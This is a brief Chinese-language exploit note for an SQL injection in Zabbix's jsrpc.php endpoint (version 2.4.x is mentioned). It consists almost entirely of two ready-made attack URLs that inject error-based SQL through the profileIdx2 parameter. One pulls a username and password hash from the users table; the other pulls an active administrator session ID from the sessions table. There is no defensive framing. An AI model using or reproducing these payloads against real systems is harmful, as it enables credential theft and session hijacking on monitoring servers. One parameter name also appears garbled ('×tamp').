zabbix(jsrpc) 最新SQL注入
获取用户名密码
http://1.2.3.4/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select%20(1)%20from%20users%20where%201=1%20aNd%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),(substring((Select%20(select%20concat(alias,0x7e,passwd,0x7e)%20from%20users%20limit%201)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b))&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17%202.4.x
获取session
http://1.2.3.4//jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select (1) from users where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (select concat(sessionid,0x7e,userid,0x7e,status) from sessions where status=0 and userid=1 LIMIT 0,1)),1,62)))a from information_schema.tables group by a)b))&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17